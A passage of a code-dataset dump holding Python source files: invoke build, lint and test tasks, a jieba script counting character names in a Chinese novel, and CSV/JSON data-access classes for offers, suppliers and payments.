'htmlcov' -exec rm -rf {} +\", echo=True)\n ctx.run(\"find . -name '.coverage*' -exec rm -rf {} +\", echo=True)\n ctx.run(\"find . -name '.pytest_cache' -exec rm -rf {} +\", echo=True)\n ctx.run(\"find . -name '.benchmarks' -exec rm -rf {} +\", echo=True)\n ctx.run(\"find . -name '*.egg-info' -exec rm -rf {} +\", echo=True)\n ctx.run(\"find . -name '.DS_Store' -exec rm -rf {} +\", echo=True)\n\n\n@task\ndef checkone(ctx, source):\n \"\"\"检查代码规范\n\n inv checkone tasks.py\n \"\"\"\n ctx.run(\n \"isort --check-only --diff {source}\".format(source=source),\n echo=True,\n )\n ctx.run(\"black --check {source}\".format(source=source), echo=True)\n ctx.run(\"flake8 {source}\".format(source=source), echo=True)\n if six.PY3:\n ctx.run(\"mypy {source}\".format(source=source), echo=True)\n\n\n@task(clean)\ndef sdist(ctx):\n ctx.run(\"python setup.py sdist\", echo=True)\n\n\n@task(clean)\ndef upload(ctx, name=\"private\"):\n \"\"\"上传包到指定pip源\"\"\"\n ctx.run(\"python setup.py sdist upload -r %s\" % name, echo=True)\n\n\n@task(sdist)\ndef tupload(ctx, name=\"private\"):\n \"\"\"上传包到指定pip源\"\"\"\n ctx.run(\"twine upload dist/* -r %s\" % name, echo=True)\n\n\n@task(clean)\ndef check(ctx, job=4):\n \"\"\"检查代码规范\"\"\"\n ctx.run(\"isort --check-only --diff %s\" % package_name, echo=True)\n if six.PY3:\n ctx.run(\"black --check %s\" % package_name, echo=True)\n ctx.run(\"flake8 %s\" % package_name, echo=True)\n if six.PY3:\n ctx.run(\"mypy %s\" % package_name, echo=True)\n\n\n@task(clean)\ndef unittest(ctx):\n \"\"\"运行单元测试和计算测试覆盖率\n\n pytest --cov-config=.coveragerc --cov=plum_tools --cov-fail-under=100 tests\n \"\"\"\n ctx.run(\n \"export PYTHONPATH=`pwd` && pytest tests\", encoding=\"utf-8\", pty=True, echo=True\n )\n\n\n@task(clean)\ndef coverage(ctx):\n \"\"\"运行单元测试和计算测试覆盖率\"\"\"\n ctx.run(\n \"export PYTHONPATH=`pwd` && \"\n \"coverage run --rcfile=.coveragerc --source=%s -m pytest tests && \"\n \"coverage report -m --fail-under=57\" % package_name,\n encoding=\"utf-8\",\n pty=True,\n echo=True,\n )\n\n\n@task(clean)\ndef unittestone(ctx, source, test):\n \"\"\"运行单元测试和计算测试覆盖率\n\n inv unittestone --source plum_tools.fib --test tests/test_fib.py\n \"\"\"\n ctx.run(\n \"export PYTHONPATH=`pwd` && \"\n \"pytest -vv -rsxS -q --cov-config=.coveragerc --cov-report term-missing \"\n \"--cov --cov-fail-under=100 {source} {test}\".format(\n source=covert_source(source), test=test\n ),\n encoding=\"utf-8\",\n pty=True,\n echo=True,\n )\n\n\n@task(clean)\ndef coverageone(ctx, source, test):\n \"\"\"运行单元测试和计算测试覆盖率\n\n inv coverageone --source 
@task(clean)\ndef coverageone(ctx, source, test):\n    \"\"\"Run the unit tests and measure coverage for a single module\n\n    inv coverageone --source plum_tools.fib --test tests/test_fib.py\n    \"\"\"\n    ctx.run(\n        \"export PYTHONPATH=`pwd` && \"\n        \"coverage run --rcfile=.coveragerc --source={source} -m pytest -vv -rsxS -q {test} && \"\n        \"coverage report -m\".format(source=convert_source(source), test=test),\n        encoding=\"utf-8\",\n        pty=True,\n        echo=True,\n    )\n\n\n@task(clean)\ndef format(ctx):\n    \"\"\"Format the code base\"\"\"\n    autoflake_args = [\n        \"--remove-all-unused-imports\",\n        \"--recursive\",\n        \"--remove-unused-variables\",\n        \"--in-place\",\n        \"--exclude=__init__.py\",\n    ]\n    ctx.run(\n        \"autoflake {args} {package_name} tests\".format(\n            args=\" \".join(autoflake_args), package_name=package_name\n        ),\n        echo=True,\n    )\n    ctx.run(\"isort %s tests\" % package_name, echo=True)\n    if six.PY3:\n        ctx.run(\"black %s tests\" % package_name, echo=True)\n\n\n@task(clean)\ndef formatone(ctx, source):\n    \"\"\"Format a single file\"\"\"\n    autoflake_args = [\n        \"--ignore-init-module-imports\",\n        \"--remove-all-unused-imports\",\n        \"--recursive\",\n        \"--remove-unused-variables\",\n        \"--in-place\",\n        \"--exclude=__init__.py\",\n    ]\n    ctx.run(\n        \"autoflake {args} {source}\".format(\n            source=source, args=\" \".join(autoflake_args)\n        ),\n        echo=True,\n    )\n    ctx.run(\"isort {source}\".format(source=source), echo=True)\n    if six.PY3:\n        ctx.run(\"black {source}\".format(source=source), echo=True)\n\n\ndef get_site_packages_dir(packages: str) -> str:\n    if packages is None:\n        return \"\"\n    if not os.getenv(\"VIRTUAL_ENV\"):\n        return \"\"\n    site_packages_dir = subprocess.check_output(\n        \"find ${VIRTUAL_ENV} -name 'site-packages'\", shell=True, text=True\n    ).strip()\n    if not packages.strip():\n        return site_packages_dir\n    packages_list = [\n        package_name.strip()\n        for package_name in packages.split(\",\")\n        if package_name.strip()\n    ]\n    packages_unique = sorted(\n        list(set(packages_list)), key=lambda x: packages_list.index(x)\n    )\n    if packages_unique:\n        return \" \".join(\n            [\n                os.path.join(site_packages_dir, package_name)\n                for package_name in packages_unique\n            ]\n        )\n    return site_packages_dir\n\n\ndef get_pylint_args(msg_ids: str, ignore_default: bool) -> list:\n    pylint_args = [\n        \"--jobs=0\",\n        \"--exit-zero\",\n        \"--persistent=n\",\n    ]\n    if not ignore_default:\n        pylint_args.append(\n            \"--ignore=.git,venv*,docs,node_modules,tests,test*.py,debug_celery.py\"\n        )\n    if msg_ids:\n        pylint_args.extend([\"--disable=all\", f\"--enable={msg_ids}\"])\n    return pylint_args\n\n\n@task\ndef pylintone(ctx, source, msg_ids=\"\", packages=None, ignore_default=False):\n    \"\"\"Run pylint on specific files\n\n    inv --help pylintone\n\n    inv pylintone --source 'plum_tools *.py' --msg-ids=\"W1505\" --packages=\"pymongo,celery\"\n    \"\"\"\n    time_str = datetime.now().strftime(\"%Y%m%d_%H%M%S\")\n    file_name = f'pylint_{msg_ids.replace(\",\", \"_\")}_{time_str}.log'\n    site_packages_dir = get_site_packages_dir(packages)\n    pylint_args = \" \".join(get_pylint_args(msg_ids, ignore_default))\n    cmd = f\"pylint {pylint_args} {source} {site_packages_dir} > {file_name}\"\n    ctx.run(cmd, echo=True)\n\n\n@task\ndef lock(ctx):\n    \"\"\"Generate the dependency lock file\n\n    1. Install pipenv\n\n    pip install pipenv\n\n    2. Install the project dependencies\n\n    pipenv install --deploy --dev --skip-lock\n    \"\"\"\n    ctx.run(\n        'if [ -f \"Pipfile.lock\" ]; then pipenv lock -v --keep-outdated ; else pipenv lock --pre --clear ; fi',\n        echo=False,\n    )\n","sub_path":"tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":7147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"497239156","text":"#CalDaQinDiGuo5v2.py\nimport jieba\n
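# (added notes) jieba.lcut segments the whole text into a flat word list; the loop\n# below drops single-character tokens and merges \"皇帝\" into \"嬴政\" so both\n# references to the emperor are counted as one person.\n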
txt = open(\"大秦帝国5.txt\", \"r\", encoding=\"utf-8\").read()\nexcludes = {\"没有\",\"秦国\",\"一个\",\"天下\",\"已经\",\"将军\",\"秦军\",\"如此\",\"立即\",\"之后\",\\\n            \"秦王\",\"自己\",\"便是\",\"太子\",\"大军\",\"不能\"}\nwords = jieba.lcut(txt)\ncounts = {}\nfor word in words:\n    if len(word) == 1:\n        continue\n    elif word == \"嬴政\" or word == \"皇帝\":\n        rword = \"嬴政\"\n    else:\n        rword = word\n    counts[rword] = counts.get(rword, 0) + 1\nfor word in excludes:\n    counts.pop(word, None)\nitems = list(counts.items())\nitems.sort(key=lambda x: x[1], reverse=True)\nprint(\"The Qin Empire, Part 5 - character appearance counts:\")\nfor i in range(5):\n    word, count = items[i]\n    print(\"{0:<10}{1:>5}\".format(word, count))\n","sub_path":"代码/Python/CalDaQinDiGuo5v2.py","file_name":"CalDaQinDiGuo5v2.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"170146239","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nfrom classes.businessClasses import *\n\n\nclass DaoAbstract(object):\n    type = 'Generic / Abstract'\n\n    def __init__(self):\n        if self.__class__.__name__ == 'DaoAbstract':\n            raise ValueError('Dao cannot be instantiated.')\n\n    def __str__(self):\n        return self.type + ' Dao'\n\n    @staticmethod\n    def _str_to_bool_(value):\n        return value == 'True'\n\n    @staticmethod\n    def _str_to_date_(value):\n        return datetime.date(int(value.split('-')[0]), int(value.split('-')[1]), int(value.split('-')[2]))\n\n    @staticmethod\n    def _create_payment_type_from_string_(payment_type_string):\n        if str(payment_type_string) == '70-30':\n            return PaymentTypeXXYY(70, 30)\n        if str(payment_type_string) == '80-20':\n            return PaymentTypeXXYY(80, 20)\n        if str(payment_type_string) == '90-10':\n            return PaymentTypeXXYY(90, 10)\n        if str(payment_type_string) == '50-50':\n            return PaymentType5050()\n        if str(payment_type_string) in ['Canje semanal', 'canje semanal']:\n            return PaymentTypeWeeklyExchanges()\n        if str(payment_type_string) in ['Canje vencimiento', 'canje al cierre']:\n            return PaymentTypeExchangedAtExpiration()\n        if str(payment_type_string) in ['100%', '1']:\n            return PaymentType100()\n        if str(payment_type_string) in ['ventas 100 al cierre', 'Ventas 100% al cierre']:\n            return PaymentType100(payment_at_expiration=True)\n        if str(payment_type_string) in ['Precompra', 'precompra', 'Pre Compra', 'pre compra']:\n            return PaymentTypePrePurchase()\n        if str(payment_type_string) in ['Manual', 'manual']:\n            return PaymentTypeManual()\n        raise ValueError('{0} is not a valid PaymentType subclass'.format(str(payment_type_string)))\n\n    def _create_payment_from_dictionary_(self, offer, sub_offer, payment_dic):\n        return Payment(offer, sub_offer, payment_dic['id'], payment_dic['original_amount'], payment_dic['amount'],\n                       datetime.date(int(payment_dic['date'].split('-')[0]), int(payment_dic['date'].split('-')[1]),\n                                     int(payment_dic['date'].split('-')[2])),\n                       PaymentMethod(payment_dic['payment_method'].split('-')[0].strip(),\n                                     payment_dic['payment_method'].split('-')[1].strip()),\n                       self._create_payment_type_from_string_(payment_dic['payment_type']), payment_dic['description'],\n                       payment_dic['status'])\n\n    def _create_sub_offer_from_dictionary_(self, offer, sub_offer_dic):\n        sub_offer = SubOffer(offer, sub_offer_dic['id'], sub_offer_dic['price'], sub_offer_dic['sold'],\n                             sub_offer_dic['exchanged'], sub_offer_dic['cancelled'], sub_offer_dic['commission'], [])\n\n        sub_offer.payments = map(lambda x: self._create_payment_from_dictionary_(offer, sub_offer, x),\n                                 sub_offer_dic['payments'])\n\n        return sub_offer\n\n    def create_offer_from_dictionary(self, offer_dic):\n        supplier = 
self.create_supplier_from_dictionary(offer_dic['supplier'])\n\n offer = Offer(offer_dic['id'], [], offer_dic['product'], supplier,\n datetime.date(int(offer_dic['date'].split('-')[0]), int(offer_dic['date'].split('-')[1]),\n int(offer_dic['date'].split('-')[2])),\n datetime.date(int(offer_dic['online_end_date'].split('-')[0]),\n int(offer_dic['online_end_date'].split('-')[1]),\n int(offer_dic['online_end_date'].split('-')[2])),\n datetime.date(int(offer_dic['expiration_date'].split('-')[0]),\n int(offer_dic['expiration_date'].split('-')[1]),\n int(offer_dic['expiration_date'].split('-')[2])),\n self._create_payment_type_from_string_(offer_dic['payment_type']),\n PaymentMethod(offer_dic['payment_method'].split('-', 1)[0].strip(),\n offer_dic['payment_method'].split('-', 1)[1].strip()), offer_dic['scout'],\n offer_dic['include_in_commercial_report'], offer_dic['include_in_payments_report'])\n\n offer.sub_offers = map(lambda x: self._create_sub_offer_from_dictionary_(offer, x), offer_dic['sub_offers'])\n\n return offer\n\n def create_supplier_from_dictionary(self, supplier_dic):\n return Supplier(supplier_dic['id'], supplier_dic['name'],\n map(lambda x: PaymentMethod(x.split('-', 1)[0].strip(), x.split('-', 1)[1].strip()),\n supplier_dic['payment_methods']),\n self._create_payment_type_from_string_(supplier_dic['default_payment_type']))\n\n def full_back_up(self):\n raise NotImplementedError('Method not implemented')\n\n @property\n def available_back_ups(self):\n raise NotImplementedError('Method not implemented')\n\n def recover_back_up(self, timestamp_string, back_up_current_data=True):\n raise NotImplementedError('Method not implemented')\n\n def persist_offer(self, persist_offer):\n raise NotImplementedError('Method not implemented')\n\n def persist_offers(self, persist_offers):\n raise NotImplementedError('Method not implemented')\n\n def retrieve_all_offers(self, payments_data=True):\n raise NotImplementedError('Method not implemented')\n\n def retrieve_offers(self, filter_offer):\n raise NotImplementedError('Method not implemented')\n\n def retrieve_offer_by_id(self, offer_id):\n raise NotImplementedError('Method not implemented')\n\n def delete_offers(self, filter_offer):\n raise NotImplementedError('Method not implemented')\n\n def delete_offer_by_id(self, offer_id):\n raise NotImplementedError('Method not implemented')\n\n def persist_supplier(self, persist_supplier):\n raise NotImplementedError('Method not implemented')\n\n @property\n def retrieve_all_suppliers(self):\n raise NotImplementedError('Method not implemented')\n\n def retrieve_suppliers(self, filter_supplier):\n raise NotImplementedError('Method not implemented')\n\n def retrieve_supplier_by_id(self, id):\n raise NotImplementedError('Method not implemented')\n\n def delete_suppliers(self, supplier_offer):\n raise NotImplementedError('Method not implemented')\n\n def delete_supplier_by_id(self, supplier_id):\n raise NotImplementedError('Method not implemented')\n\nimport csv\nimport shutil\n\n\nclass DaoCSV(DaoAbstract):\n type = 'CSV'\n files_path = '../../../../data/'\n offers_file = 'offers.csv'\n offers_field_names = ['offerId', 'product', 'supplier', 'date', 'onlineEndDate', 'expirationDate', 'paymentType',\n 'paymentMethod', 'paymentData', 'includeInCommercialReport', 'includeInPaymentsReport',\n 'subOfferId', 'price', 'sold', 'exchanged', 'cancelled', 'commission', 'scout']\n suppliers_file = 'suppliers.csv'\n suppliers_field_names = ['Id', 'name', 'defaultPaymentType', 'paymentMethod', 'paymentData']\n 
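# NOTE (added): these CSVs are denormalized - offers.csv holds one row per sub-offer\n    # and suppliers.csv one row per payment method; rows sharing an id are merged back\n    # into a single object on load (see the retrieve_* methods below).\n    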
payments_file = 'payments.csv'\n payments_field_names = ['offerId', 'subOfferId', 'Id', 'originalAmount', 'amount', 'date', 'paymentMethod',\n 'paymentData', 'paymentType', 'description', 'status']\n files_path_bkp = '../../../../data/bkps/'\n offers_file_bkp = 'offers_{0}.csv'\n suppliers_file_bkp = 'suppliers_{0}.csv'\n payments_file_bkp = 'payments_{0}.csv'\n\n def __init__(self, files_path='../../../../data/'):\n self.files_path = files_path\n self.offers_file = files_path + self.offers_file\n self.suppliers_file = files_path + self.suppliers_file\n self.payments_file = files_path + self.payments_file\n self.files_path_bkp = '{0}bkps/'.format(files_path)\n self.offers_file_bkp = self.files_path_bkp + self.offers_file_bkp\n self.suppliers_file_bkp = self.files_path_bkp + self.suppliers_file_bkp\n self.payments_file_bkp = self.files_path_bkp + self.payments_file_bkp\n return\n\n def full_back_up(self):\n now = str(datetime.datetime.now()).replace('-', '').replace(':', '').replace('.', '').replace(' ', '')\n shutil.copyfile(self.offers_file, self.offers_file_bkp.format(now))\n shutil.copyfile(self.suppliers_file, self.suppliers_file_bkp.format(now))\n shutil.copyfile(self.payments_file, self.payments_file_bkp.format(now))\n return\n\n @staticmethod\n def _create_dict_reader_(file, fields):\n return csv.DictReader(file, lineterminator='\\n', escapechar='\\\\', fieldnames=fields)\n\n @staticmethod\n def _create_dict_writer_(file, fields):\n return csv.DictWriter(file, lineterminator='\\n', escapechar='\\\\', fieldnames=fields)\n\n def _offer_payments_as_dictionaries_(self, offer):\n dictionaries = []\n for sub_offer in offer.sub_offers:\n for payment in sub_offer.payments:\n dictionary = {}\n for header in self.payments_field_names:\n if header == 'offerId':\n dictionary[header] = str(offer.id)\n if header == 'subOfferId':\n if payment.sub_offer is not None:\n dictionary[header] = str(payment.sub_offer.id)\n else:\n dictionary[header] = ''\n if header == 'Id':\n dictionary[header] = str(payment.id)\n if header == 'originalAmount':\n dictionary[header] = str(payment.original_amount)\n if header == 'amount':\n dictionary[header] = str(payment.amount)\n if header == 'date':\n dictionary[header] = str(payment.date)\n if header == 'paymentMethod':\n dictionary[header] = payment.payment_method.method\n if header == 'paymentData':\n dictionary[header] = payment.payment_method.data\n if header == 'paymentType':\n if payment.payment_type is not None:\n dictionary[header] = payment.payment_type.name\n else:\n dictionary[header] = ''\n if header == 'description':\n dictionary[header] = str(payment.description)\n if header == 'status':\n dictionary[header] = str(payment.status)\n dictionaries.append(dictionary)\n return dictionaries\n\n def _persist_offer_payments_(self, offer):\n payments_file = open(self.payments_file, 'rU')\n payments_reader = self._create_dict_reader_(payments_file, self.payments_field_names)\n # skip headers\n payments_reader.next()\n rows = {}\n for row in payments_reader:\n if int(row['offerId']) not in rows.keys():\n rows[int(row['offerId'])] = [row]\n else:\n rows[int(row['offerId'])].append(row)\n\n payments_file.close()\n\n payments_file = open(self.payments_file, 'w')\n payments_writer = self._create_dict_writer_(payments_file, self.payments_field_names)\n payments_writer.writeheader()\n for offer_id in rows.keys():\n if offer_id != offer.id:\n payments_writer.writerows(rows[offer_id])\n payments_writer.writerows(self._offer_payments_as_dictionaries_(offer))\n 
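# (added note) Persistence is read-all / filter-out / rewrite: rows of every other\n        # offer are copied back untouched and this offer's payments are re-serialized,\n        # so the CSV is rewritten in full on each save.\n        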
payments_file.close()\n\n def _persist_offers_payments_(self, offers):\n payments_file = open(self.payments_file, 'rU')\n payments_reader = self._create_dict_reader_(payments_file, self.payments_field_names)\n # skip headers\n payments_reader.next()\n rows = {}\n for row in payments_reader:\n if int(row['offerId']) not in rows.keys():\n rows[int(row['offerId'])] = [row]\n else:\n rows[int(row['offerId'])].append(row)\n\n payments_file.close()\n\n payments_file = open(self.payments_file, 'w')\n payments_writer = self._create_dict_writer_(payments_file, self.payments_field_names)\n payments_writer.writeheader()\n for offer_id in rows.keys():\n if offer_id not in map(lambda x: x.id, offers):\n payments_writer.writerows(rows[offer_id])\n for offer in offers:\n payments_writer.writerows(self._offer_payments_as_dictionaries_(offer))\n payments_file.close()\n\n def _retrieve_offer_payments_(self, offer_id):\n payments = []\n payments_file = open(self.payments_file, 'rU')\n payments_reader = self._create_dict_reader_(payments_file, self.payments_field_names)\n # skip headers\n payments_reader.next()\n for row in payments_reader:\n if int(row['offerId']) == offer_id:\n if row['subOfferId'] != '':\n sub_offer_id = row['subOfferId']\n else:\n sub_offer_id = '0'\n payment_method = PaymentMethod(row['paymentMethod'], row['paymentData'])\n payment_type = self._create_payment_type_from_string_(row['paymentType'])\n payments.append(Payment(None, int(sub_offer_id), int(row['Id']), float(row['originalAmount']),\n float(row['amount']), self._str_to_date_(row['date']), payment_method,\n payment_type, row['description'], row['status']))\n return payments\n\n def _delete_offer_payments_(self, delete_offer):\n payments_file = open(self.payments_file, 'rU')\n payments_reader = self._create_dict_reader_(payments_file, self.payments_field_names)\n # skip headers\n payments_reader.next()\n rows = {}\n for row in payments_reader:\n if int(row['offerId']) not in rows.keys():\n rows[int(row['offerId'])] = [row]\n else:\n rows[int(row['offerId'])].append(row)\n\n payments_file.close()\n\n payments_file = open(self.payments_file, 'w')\n payments_writer = self._create_dict_writer_(payments_file, self.payments_field_names)\n payments_writer.writeheader()\n for offer_id in rows.keys():\n if offer_id != delete_offer.id:\n payments_writer.writerows(rows[offer_id])\n payments_file.close()\n return\n\n def _offer_as_dictionaries_(self, offer):\n dictionaries = []\n for sub_offer in offer.sub_offers:\n dictionary = {}\n for header in self.offers_field_names:\n if header == 'offerId':\n dictionary[header] = str(offer.id)\n if header == 'product':\n dictionary[header] = offer.product\n if header == 'supplier':\n if offer.supplier is not None:\n dictionary[header] = str(offer.supplier.id)\n else:\n dictionary[header] = ''\n if header == 'date':\n dictionary[header] = str(offer.date)\n if header == 'onlineEndDate':\n dictionary[header] = str(offer.online_end_date)\n if header == 'expirationDate':\n dictionary[header] = str(offer.expiration_date)\n if header == 'paymentType':\n if offer.payment_type is not None:\n dictionary[header] = offer.payment_type.name\n else:\n dictionary[header] = ''\n if header == 'paymentMethod':\n if offer.payment_method is not None:\n dictionary[header] = offer.payment_method.method\n else:\n dictionary[header] = ''\n if header == 'paymentData':\n if offer.payment_method is not None:\n dictionary[header] = offer.payment_method.data\n else:\n dictionary[header] = ''\n if header == 
'includeInCommercialReport':\n dictionary[header] = str(offer.include_in_commercial_report)\n if header == 'includeInPaymentsReport':\n dictionary[header] = str(offer.include_in_payments_report)\n if header == 'subOfferId':\n dictionary[header] = str(sub_offer.id)\n if header == 'price':\n dictionary[header] = str(sub_offer.price)\n if header == 'sold':\n dictionary[header] = str(sub_offer.sold)\n if header == 'exchanged':\n dictionary[header] = str(sub_offer.exchanged)\n if header == 'cancelled':\n dictionary[header] = str(sub_offer.cancelled)\n if header == 'commission':\n dictionary[header] = str(sub_offer.commission)\n if header == 'scout':\n dictionary[header] = offer.scout\n dictionaries.append(dictionary)\n return dictionaries\n\n def persist_offer(self, persist_offer):\n offers = self.retrieve_all_offers()\n offers_file = open(self.offers_file, 'w')\n offers_writer = self._create_dict_writer_(offers_file, self.offers_field_names)\n offers_writer.writeheader()\n for offer in offers:\n if offer != persist_offer:\n offers_writer.writerows(self._offer_as_dictionaries_(offer))\n offers_writer.writerows(self._offer_as_dictionaries_(persist_offer))\n offers_file.close()\n self._persist_offer_payments_(persist_offer)\n\n def persist_offers(self, persist_offers):\n offers = self.retrieve_all_offers()\n offers_file = open(self.offers_file, 'w')\n offers_writer = self._create_dict_writer_(offers_file, self.offers_field_names)\n offers_writer.writeheader()\n for offer in offers:\n if offer not in persist_offers:\n offers_writer.writerows(self._offer_as_dictionaries_(offer))\n for new_offer in persist_offers:\n offers_writer.writerows(self._offer_as_dictionaries_(new_offer))\n offers_file.close()\n self._persist_offers_payments_(persist_offers)\n\n def retrieve_all_offers(self, payments_data=True):\n offers = []\n offers_file = open(self.offers_file, 'rU')\n offers_reader = self._create_dict_reader_(offers_file, self.offers_field_names)\n # skip header\n offers_reader.next()\n for row in offers_reader:\n id = int(row['offerId'])\n if len(filter(lambda x: x.id == id, offers)) == 0:\n if row['supplier'] != '':\n supplier = self.retrieve_supplier_by_id(int(row['supplier']))\n else:\n supplier = None\n payment_type = self._create_payment_type_from_string_(row['paymentType'])\n payment_method = PaymentMethod(row['paymentMethod'], row['paymentData'])\n\n offer = Offer(id, [], row['product'], supplier, self._str_to_date_(row['date']),\n self._str_to_date_(row['onlineEndDate']), self._str_to_date_(row['expirationDate']),\n payment_type, payment_method, row['scout'],\n self._str_to_bool_(row['includeInCommercialReport']),\n self._str_to_bool_(row['includeInPaymentsReport']))\n\n sub_offer = SubOffer(offer, int(row['subOfferId']), float(row['price']), int(row['sold']),\n int(row['exchanged']), int(row['cancelled']), float(row['commission']), [])\n offer.sub_offers = [sub_offer]\n\n offers.append(offer)\n else:\n offer = filter(lambda x: x.id == id, offers)[0]\n sub_offer = SubOffer(offer, int(row['subOfferId']), float(row['price']), int(row['sold']),\n int(row['exchanged']), int(row['cancelled']), float(row['commission']), [])\n offer.sub_offers.append(sub_offer)\n\n offers_file.close()\n\n if payments_data:\n for offer in offers:\n offer.add_payments(self._retrieve_offer_payments_(offer.id))\n\n return offers\n\n def retrieve_offers(self, filter_offer):\n return filter(lambda x: x.filter_from_template(filter_offer), self.retrieve_all_offers())\n\n def retrieve_offer_by_id(self, offer_id):\n offers = 
self.retrieve_all_offers()\n if len(filter(lambda x: x.id == offer_id, offers)) > 0:\n return filter(lambda x: x.id == offer_id, offers)[0]\n else:\n return None\n\n def _delete_offer_(self, delete_offer):\n offers = self.retrieve_all_offers()\n offers_file = open(self.offers_file, 'w')\n offers_writer = self._create_dict_writer_(offers_file, self.offers_field_names)\n offers_writer.writeheader()\n for offer in offers:\n if offer != delete_offer:\n offers_writer.writerows(self._offer_as_dictionaries_(offer))\n offers_file.close()\n self._delete_offer_payments_(delete_offer)\n return\n\n def delete_offers(self, filter_offer):\n for offer in filter(lambda x: x.filter_from_template(filter_offer), self.retrieve_all_offers()):\n self._delete_offer_(offer)\n return\n\n def delete_offer_by_id(self, offer_id):\n for offer in filter(lambda x: x.id == offer_id, self.retrieve_all_offers()):\n self._delete_offer_(offer)\n return\n\n def _supplier_as_dictionaries_(self, supplier):\n dictionaries = []\n for payment_method in supplier.payment_methods:\n dictionary = {}\n for header in self.suppliers_field_names:\n if header == 'Id':\n dictionary[header] = str(supplier.id)\n if header == 'name':\n dictionary[header] = supplier.name\n if header == 'defaultPaymentType':\n if supplier.default_payment_type is not None:\n dictionary[header] = str(supplier.default_payment_type.name)\n else:\n dictionary[header] = ''\n if header == 'paymentMethod':\n dictionary[header] = str(payment_method.method)\n if header == 'paymentData':\n dictionary[header] = str(payment_method.data)\n dictionaries.append(dictionary)\n return dictionaries\n\n def persist_supplier(self, persist_supplier):\n suppliers = self.retrieve_all_suppliers\n suppliers_file = open(self.suppliers_file, 'w')\n suppliers_writer = self._create_dict_writer_(suppliers_file, self.suppliers_field_names)\n suppliers_writer.writeheader()\n for supplier in suppliers:\n if supplier != persist_supplier:\n suppliers_writer.writerows(self._supplier_as_dictionaries_(supplier))\n suppliers_writer.writerows(self._supplier_as_dictionaries_(persist_supplier))\n suppliers_file.close()\n return\n\n @property\n def retrieve_all_suppliers(self):\n suppliers = []\n suppliers_file = open(self.suppliers_file, 'rU')\n suppliers_reader = self._create_dict_reader_(suppliers_file, self.suppliers_field_names)\n # skip header\n suppliers_reader.next()\n for row in suppliers_reader:\n id = int(row['Id'])\n if len(filter(lambda x: x.id == id, suppliers)) == 0:\n payment_method = PaymentMethod(row['paymentMethod'], row['paymentData'])\n if row['defaultPaymentType'] != '':\n default_payment_type = self._create_payment_type_from_string_(row['defaultPaymentType'])\n else:\n default_payment_type = None\n supplier = Supplier(id, row['name'], [payment_method], default_payment_type)\n\n suppliers.append(supplier)\n else:\n supplier = filter(lambda x: x.id == id, suppliers)[0]\n payment_method = PaymentMethod(row['paymentMethod'], row['paymentData'])\n supplier.payment_methods.append(payment_method)\n\n suppliers_file.close()\n\n return suppliers\n\n def retrieve_suppliers(self, filter_supplier):\n return filter(lambda x: x.filter_from_template(filter_supplier), self.retrieve_all_suppliers)\n\n def retrieve_supplier_by_id(self, id):\n suppliers = self.retrieve_all_suppliers\n if len(filter(lambda x: x.id == id, suppliers)) > 0:\n return filter(lambda x: x.id == id, suppliers)[0]\n else:\n return None\n\n def _delete_supplier_(self, delete_supplier):\n suppliers = self.retrieve_all_suppliers\n 
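# (added note) retrieve_all_suppliers is a @property, hence no call parentheses.\n        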
suppliers_file = open(self.suppliers_file, 'w')\n        suppliers_writer = self._create_dict_writer_(suppliers_file, self.suppliers_field_names)\n        suppliers_writer.writeheader()\n        for supplier in suppliers:\n            if supplier != delete_supplier:\n                suppliers_writer.writerows(self._supplier_as_dictionaries_(supplier))\n        suppliers_file.close()\n        return\n\n    def delete_suppliers(self, filter_supplier):\n        for supplier in filter(lambda x: x.filter_from_template(filter_supplier), self.retrieve_all_suppliers):\n            self._delete_supplier_(supplier)\n        return\n\n    def delete_supplier_by_id(self, supplier_id):\n        for supplier in filter(lambda x: x.id == supplier_id, self.retrieve_all_suppliers):\n            self._delete_supplier_(supplier)\n        return\n\n\nimport codecs\nimport json\nimport glob\nimport re\n\n\nclass DaoJSON(DaoAbstract):\n    type = 'JSON'\n    files_path = '../../../../data/'\n    offers_file = 'offers.json'\n    suppliers_file = 'suppliers.json'\n    payments_file = 'payments.json'\n    files_path_bkp = '../../../../data/bkps/'\n    offers_file_bkp = 'offers_{0}.json'\n    suppliers_file_bkp = 'suppliers_{0}.json'\n    payments_file_bkp = 'payments_{0}.json'\n\n    def __init__(self, files_path='../../../../data/'):\n        super(DaoJSON, self).__init__()\n\n        self.files_path = files_path\n        self.offers_file = files_path + self.offers_file\n        self.suppliers_file = files_path + self.suppliers_file\n        self.payments_file = files_path + self.payments_file\n        self.files_path_bkp = '{0}bkps/'.format(files_path)\n        self.offers_file_bkp = self.files_path_bkp + self.offers_file_bkp\n        self.suppliers_file_bkp = self.files_path_bkp + self.suppliers_file_bkp\n        self.payments_file_bkp = self.files_path_bkp + self.payments_file_bkp\n\n    def full_back_up(self):\n        now = str(datetime.datetime.now()).replace('-', '').replace(':', '').replace('.', '').replace(' ', '')\n        shutil.copyfile(self.offers_file, self.offers_file_bkp.format(now))\n        shutil.copyfile(self.suppliers_file, self.suppliers_file_bkp.format(now))\n        shutil.copyfile(self.payments_file, self.payments_file_bkp.format(now))\n\n    @property\n    def available_back_ups(self):\n        timestamps = []\n        for offers_file in glob.glob(self.offers_file_bkp.format('*')):\n            datetime_created_string = re.search('([^(0-9)]*)([0-9]+)(.*)', offers_file).group(2)\n            datetime_created = datetime.datetime(int(datetime_created_string[0:4]), int(datetime_created_string[4:6]),\n                                                 int(datetime_created_string[6:8]), int(datetime_created_string[8:10]),\n                                                 int(datetime_created_string[10:12]),\n                                                 int(datetime_created_string[12:14]))\n\n            timestamps.append({'timestamp': str(datetime_created), 'timestamp_string': datetime_created_string})\n\n        return timestamps\n\n    def recover_back_up(self, timestamp_string, back_up_current_data=True):\n        if back_up_current_data:\n            self.full_back_up()\n        shutil.copyfile(self.offers_file_bkp.format(timestamp_string), self.offers_file)\n        shutil.copyfile(self.suppliers_file_bkp.format(timestamp_string), self.suppliers_file)\n        shutil.copyfile(self.payments_file_bkp.format(timestamp_string), self.payments_file)\n\n    def _persist_offer_payments_(self, offer):\n        payments_dict = filter(lambda x: int(x['offer_id']) != offer.id,\n                               json.load(codecs.open(self.payments_file, 'r', 'utf-8')))\n        for sub_offer in offer.sub_offers:\n            payments_dict.extend(map(lambda x: x.as_dictionary, sub_offer.payments))\n        json.dump(payments_dict, codecs.open(self.payments_file, 'w', 